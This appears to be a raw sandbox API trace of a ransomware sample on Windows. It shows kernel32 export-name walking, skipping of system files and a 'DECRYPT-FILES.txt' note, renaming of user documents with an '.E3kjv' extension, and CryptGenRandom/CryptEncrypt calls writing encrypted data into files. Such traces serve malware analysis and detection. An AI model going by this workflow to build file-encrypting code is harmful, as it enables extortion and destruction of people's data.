(lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.694] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.694] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.694] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.694] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.694] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.694] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.694] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.694] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.695] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.695] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.695] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.695] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.695] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.695] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.695] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.695] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.695] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.695] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.695] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.695] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.695] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx") returned 55 [0083.695] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx.E3kjv") returned 61 [0083.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-keodegshy.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx.E3kjv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-keodegshy.xlsx.e3kjv"), dwFlags=0x0) returned 1 [0083.696] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.696] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.696] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.697] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e6f580, ftCreationTime.dwHighDateTime=0x1d4d2b1, ftLastAccessTime.dwLowDateTime=0x3f550a00, ftLastAccessTime.dwHighDateTime=0x1d4c89f, ftLastWriteTime.dwLowDateTime=0x3f550a00, ftLastWriteTime.dwHighDateTime=0x1d4c89f, nFileSizeHigh=0x0, nFileSizeLow=0x692f, dwReserved0=0x0, dwReserved1=0x0, cFileName="-_DUtxFwiSOA_.ods", cAlternateFileName="-_DUTX~1.ODS")) returned 1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="DECRYPT-FILES.txt") returned -1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="autorun.inf") returned -1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="boot.ini") returned -1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="desktop.ini") returned -1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="ntuser.dat") returned -1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="iconcache.db") returned -1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="bootsect.bak") returned -1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="ntuser.dat.log") returned -1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="thumbs.db") returned -1 [0083.697] lstrcmpiW (lpString1="-_DUtxFwiSOA_.ods", lpString2="Bootfont.bin") returned -1 [0083.697] lstrlenW (lpString="-_DUtxFwiSOA_.ods") returned 17 [0083.697] lstrcmpiW (lpString1="ods", lpString2="lnk") returned 1 [0083.697] lstrcmpiW (lpString1="ods", lpString2="exe") returned 1 [0083.697] lstrcmpiW (lpString1="ods", lpString2="sys") returned -1 [0083.697] lstrcmpiW (lpString1="ods", lpString2="dll") returned 1 [0083.697] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0083.697] lstrlenW (lpString="-_DUtxFwiSOA_.ods") returned 17 [0083.697] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0083.697] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="-_DUtxFwiSOA_.ods" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods" [0083.697] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-_dutxfwisoa_.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.698] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=26927) returned 1 [0083.698] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.698] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.698] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.698] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.698] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.698] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.699] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.699] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.699] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.700] CloseHandle (hObject=0x414) returned 1 [0083.700] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.700] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.701] CloseHandle (hObject=0x0) returned 0 [0083.701] CloseHandle (hObject=0x410) returned 1 [0083.701] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.701] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.701] GetTickCount () returned 0x114d643 [0083.701] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.702] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.702] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.702] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.702] lstrlenA (lpString="kernel32.dll") returned 12 [0083.702] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.702] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.702] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.702] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.702] lstrlenA (lpString="ADDATOMA") returned 8 [0083.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.702] lstrlenA (lpString="ADDATOMW") returned 8 [0083.702] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.703] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.703] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.703] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.703] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.703] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.703] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.703] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.703] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.703] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.703] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.703] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.703] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.703] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.703] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.703] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.703] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.703] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.703] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.703] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.703] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.704] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.704] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.704] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.704] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.704] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.704] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.704] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.704] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.704] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.704] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.704] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.704] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.704] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.704] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.704] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.704] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.704] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.704] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.704] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.705] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.705] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.705] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.705] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.705] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.705] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.705] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.705] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.705] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.705] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.705] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.705] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.705] lstrlenA (lpString="BEEP") returned 4 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.705] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.705] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.705] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.705] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.705] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.705] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.706] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.706] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.706] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.706] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.706] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.706] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.706] lstrlenA (lpString="CANCELIO") returned 8 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.706] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.706] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.706] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.706] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.706] 